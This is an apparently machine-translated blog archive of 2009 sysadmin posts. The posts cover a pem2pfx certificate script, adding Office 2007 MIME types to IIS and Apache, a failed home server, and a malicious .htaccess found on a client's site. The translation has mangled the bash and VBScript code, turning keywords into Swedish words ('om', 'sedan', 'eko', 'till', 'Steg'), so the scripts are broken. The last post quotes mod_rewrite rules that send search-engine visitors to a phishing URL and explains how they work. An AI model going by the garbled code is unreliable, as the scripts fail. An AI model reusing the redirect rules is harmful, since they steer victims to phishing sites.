Tagg-arkiv för » apache «

Onsdag, March 18th, 2009 | Författare:

[edit] So much for that. It turns out that openssl is able to determine that the key and certificate are already in a single file. Därför, ingen csplitting required (samt, I hope somebody reading this at least learned about how nice csplit is). In fact, the whole script might as well be obsoleteblaargh. Well, at least it gives a nice warning about not giving a blank passphrase. 😀

Here’s the new version:

pem2pfx – omvandlar en .pem-formaterad fil som innehåller en privat nyckel och signerat certifikat i en Windows-kompatibel .pfx certifikatfilen.

#!/bin / bash
#pem2pfx
#v0.2
#Tricky - brendan@erwJagftspJagrJagt.co.zen
# Omvandlar en .pem certifikatfilen till .pfx format
# $1 är källfilen
uppsättning -e
 
om [ $# = 1 ]; sedan
  utdatafil='eko $1 | men 'S / .pem $ /. Pfx /''
 
  eko "Please specify a password below. Windows vägrar att importera en .pfx certifikat med ett tomt lösenord."
  openssl pKCS12 -exportera -ut $utdatafil -i $1
 
 annan
  eko "pem2pfx - omvandlar en .pem formaterad privata nyckel och certifikatfilen till en IIS-kompatibel .pfx fil."
  eko "Usage: pem2pfx inputfile.pem"
vara

mer…

Dela med sig
Lördag, 21 februari, 2009 | Författare:

De relativt nya dokumenttyper Kontors 2007 har gett en del webbhotell problem när deras kunder vill erbjuda dokument för nedladdning. Oftast, dokumenten som erbjuds av webbservern som “text / html” som sedan återges som ett ton skräp på nätet användarens skärm.

Det bästa sättet att lösa detta är att lägga all MIME slag till serverns huvud konfiguration. IIS7 för Windows redan har dessa MIME-typer inställd som standard. IIS6 och IIS5 kräver MIME-typer som ska läggas, som kanske Apache på äldre installationer. För Apache, finns det också en lösning för den enskilde ägaren domänen för att lägga till MIME-typer via Apaches .htaccess fil.

IIS 6 MIME-typ tillägg (för Server Administrator)

Innan detta kan göras, se till att din server är också inställd på att tillåta direkt metabasen redigering:

  1. Belastning IIS-hanteraren: Start -> Run, “inetmgr” -> [OK]
  2. Högerklicka på “server” och klicka “Properties”
  3. Inom “Internet Information Services” flik (oftast den enda fliken), säkerställa att den “Enkunna Direkt Meta Redigera” kryssrutan är markerad.
  4. Klicka [OK]

Se till att Säkerhetskopiera IIS konfiguration (här för IIS5) förhand. Jag kommer inte att ta något ansvar för en admin bryta hans server. Jag har anledning att tro detta får också arbeta på IIS5 men jag har lika mycket anledning att tro att det bara kan ge massor av fel. Om en IIS5 / Windows 2000 admin är villig att testa detta för mig efter säkerhetskopieringen konfigurationen låt mig veta om resultaten.

Kopiera följande text i en fil med namnet msoff07-addmime.vbs och exekvera den en gång från kommandoraden genom att skriva cscript msoff07-addmime.vbs och trycka på Enter. Om du kör den mer än en gång, MIME-typerna kommer varje gång och du kommer att ha flera identiska poster:

"Detta skript lägger den nödvändiga Office 2007 MIME-typer till en IIS 6 Server.
"För att använda det här skriptet, dubbelklicka eller köra den från en kommandorad.
"Kör det här skriptet flera gånger resulterar i flera poster i
"IIS MimeMap så du bör inte köra det mer än en gång.
"Modifierad från http://msdn.microsoft.com/en-us/library/ms752346.aspx
 
Ingen MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
Const ADS_PROPERTY_UPDATE = 2 
 
"Ställ in MIME-typer som ska läggas
MimeTypesToAddArray = Array(".docm", "application/vnd.ms-word.document.macroEnabled.12", _
".docx", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application/vnd.ms-word.template.macroEnabled.12", _
".dotx", "application/vnd.openxmlformats-officedocument.wordprocessingml.template", _
".potm", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "application/vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "application/vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "application/vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "application/vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application/vnd.ms-excel.template.macroEnabled.12", _
".xltx", "application/vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
' Get the mimemap object
Set MimeMapObj = GetObject("IIS://LocalHost/MimeMap")
 
' Call AddMimeType for every pair of extension/MIME type
For counter = 0 till UBound(MimeTypesToAddArray) Steg 2
    AddMimeType MimeTypesToAddArray(counter), MimeTypesToAddArray(counter+1)
Next
 
' Create a Shell object
Set WshShell = CreateObject("WScript.Shell")
 
' Stop and Start the IIS Service
Set oExec = WshShell.Exec("net stop w3svc")
Do While oExec.Status = 0
    WScript.Sleep 100
Loop
 
Set oExec = WshShell.Exec("net start w3svc")
Do While oExec.Status = 0
    WScript.Sleep 100
Loop
 
Set oExec = Nothing
 
' Report status to user
WScript.Echo "Microsoft Office 2007 Document MIME types have been registered."
 
' AddMimeType Sub
Sub AddMimeType (Ext, MType)
 
    ' Get the mappings from the MimeMap property.
    MimeMapArray = MimeMapObj.GetEx("MimeMap") 
 
    ' Add a new mapping.
    Jag = UBound(MimeMapArray) + 1
    Redim Preserve MimeMapArray(Jag)
    Set MimeMapArray(Jag) = CreateObject("MimeMap")
    MimeMapArray(Jag).Extension = Ext
    MimeMapArray(Jag).MimeType = MType
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.SetInfo
 
End Sub

Apache MIME type addition (för Server Administrator)

Apache stores its MIME types in a file normally located at $installpath/conf/mime.types. See the mod_mime documentation for more on how it works. Arch Linux installs its MIME types at /etc/httpd/conf/mime.types och Parallels Plesk installs it in /usr/local/psa/admin/conf/mime.types. Your distribution might have it in another place, so find your mime.types file by running locate mime.types.

Add the following lines to your mime.types file:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Apache MIME type addition (For the domain owner with at least FTP accessusing .htaccess file)

Add the following text to your domain’s .htaccess fil, most commonly in an httpdocs/ directory

AddType application/vnd.ms-word.document.macroEnabled.12 docm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application/vnd.ms-word.template.macroEnabled.12 dotm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType application/vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType application/vnd.openxmlformats-officedocument.presentationml.template potx
AddType application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType application/vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType application/vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType application/vnd.ms-excel.addin.macroEnabled.12 xlam
AddType application/vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType application/vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx
AddType application/vnd.ms-excel.template.macroEnabled.12 xltm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.template xltx
Dela med sig
Tuesday, February 17th, 2009 | Författare:

Some of you may already know that I built a home server not too long ago. I documented some of the very important parts of how it was built though I was planning on releasing all the documentation all at once. I was using Arch Linux and I hadn’t nearly finished everything, especially the documentation. Till exempel, it was supposed to be a media server. After some disk shuffling, it was supposed to end up having a RAID1 for the boot and RAID 10 for the rest (the media part).

This didn’t work out at all.

I got as far as having an efficient (och samtfirewalled) routing gateway server. I was finally satisfied that the customised local routing* was working correctly and I was confident that my tests with DHCP meant I could disable the DHCP service on the flimsy ADSL router and have all my flatmates start using the server as the Internet gateway. Instead: I was logged in to the server from the office, I’d just installed Apache2**, and I was about to consult with a colleague regarding getting nice graphs put together so the flatmates could all see who was using up the bandwidth***when I noticed a little message indicating that the root filesystem had been remounted read-only due to some or other disk failure.

And then I lost my connection to the server.

And then I gained a foul mood.

🙁

When I arrived home, I found that, as I had guessed from the descriptive message given at the office, the (mycket) old 80GB IDE disk that I was using for the root filesystem had failed. Unfortunately, the server would never boot again and there was little chance of prying everything off onto another disk to continue where I’d left off.

I’m buying a replacement (SATA) HDD this next weekend just after pay dayand I’ve changed my mind about documenting my progressand backing up my configurations:

Release Early. Release Often.

* ISPs in South Africa charge less (easy price comparison) forlocal-only” (within South Africa) traffic on ADSL but only if you use an ADSL account that CANNOT access web services outside of South Africa. This means that if you want to take advantage of the reduced costs but still be able to access the Internet at large, you need to set up some sneaky routing.

** one-command-install: ~$ yaourt -S apache

*** Internet Access in SA is expensiveyou get charged about R70 ($7 / £4.9 / €5.46) per GB when using ADSL, or about R2 per MB if using GPRS / 3G.

Dela med sig
Torsdag, January 22nd, 2009 | Författare:

I very recently found a problem with a client’s web site due to a .htaccess fil. The site was hosted on a Windows server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,ELLER]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,ELLER]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,ELLER]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,ELLER]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,ELLER]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,ELLER]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Naturligtvis, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

Dela med sig